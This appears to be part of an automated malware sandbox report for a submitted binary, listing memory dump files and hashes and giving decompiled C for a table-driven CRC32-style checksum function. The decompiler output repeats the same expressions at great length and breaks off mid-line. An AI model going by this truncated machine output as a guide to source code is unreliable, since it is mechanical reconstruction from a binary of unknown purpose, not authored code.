RtlNtStatusToDosError.NTDLL(00000000), ref: 00402BDC

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: fd70c6a1e4d40da8c923c772703ace5b5189dbf6a142f0a3deafb1b24f41898b
Instruction ID: 27a1c20b567889baf91b30b55b07558cd1ebc90bba1dae48dbc2332d355ac90a
Opcode Fuzzy Hash: fd70c6a1e4d40da8c923c772703ace5b5189dbf6a142f0a3deafb1b24f41898b
Instruction Fuzzy Hash: AEC012315042016BDE085F10DD1DE2B7B25FB60740F50942DB446950B0C6B4A850CA14

Uniqueness

Uniqueness Score: -1,00%

Function 0042C7E4, Relevance: 1.4, Strings: 1, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042C7E4(signed int __eax, void* __ecx, signed char __edx, unsigned int _a4) {
				unsigned int _v8;
				signed int _t100;
				signed int _t103;
				signed char _t190;
				signed int _t239;
				void* _t242;
				signed char* _t245;
				signed int* _t247;
				signed int* _t248;
				signed int* _t249;
				signed int* _t250;
				signed int* _t251;
				signed int* _t252;
				signed int* _t253;

				_t190 = __edx;
				_t100 =  !__eax;
				if(_a4 != 0) {
					while((_t190 & 0x00000003) != 0) {
						_t100 = _t100 >> 0x00000008 ^  *(0x4529a0 + (( *_t190 & 0x000000ff ^ _t100) & 0x000000ff) * 4);
						_t190 = _t190 + 1;
						_t6 =  &_a4;
						 *_t6 = _a4 - 1;
						if( *_t6 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t245 = _t190;
				_t242 = 4;
				if(_a4 >= 0x20) {
					_v8 = _a4 >> 5;
					do {
						_t105 = _t100 ^  *_t245;
						_t247 =  &(_t245[_t242]);
						_t212 =  *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247;
						_t248 = _t247 + _t242;
						_t114 =  *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248;
						_t249 = _t248 + _t242;
						_t221 =  *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249;
						_t250 = _t249 + _t242;
						_t123 =  *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t221 >> 0x18) * 4) ^  *(0x4535a0 + (_t221 & 0x000000ff) * 4) ^  *_t250;
						_t251 = _t250 + _t242;
						_t230 =  *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t221 >> 0x18) * 4) ^  *(0x4535a0 + (_t221 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t221 >> 0x18) * 4) ^  *(0x4535a0 + (_t221 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t123 >> 0x18) * 4) ^  *(0x4535a0 + (_t123 & 0x000000ff) * 4) ^  *_t251;
						_t252 = _t251 + _t242;
						_a4 = _a4 - 0x20;
						_t132 =  *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t221 >> 0x18) * 4) ^  *(0x4535a0 + (_t221 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t212 >> 0x18) * 4) ^  *(0x4535a0 + (_t212 & 0x000000ff) * 4) ^  *_t248) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t114 >> 0x18) * 4) ^  *(0x4535a0 + (_t114 & 0x000000ff) * 4) ^  *_t249) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t221 >> 0x18) * 4) ^  *(0x4535a0 + (_t221 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t123 >> 0x18) * 4) ^  *(0x4535a0 + (_t123 & 0x000000ff) * 4) ^  *_t251) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + (( *(0x452da0 + ((_t100 ^  *_t245) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4531a0 + ((_t100 ^  *_t245) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4529a0 + (_t105 >> 0x18) * 4) ^  *(0x4535a0 + (_t105 & 0x000000ff) * 4) ^  *_t247) >> 0x00000008 & 0x000000ff) * 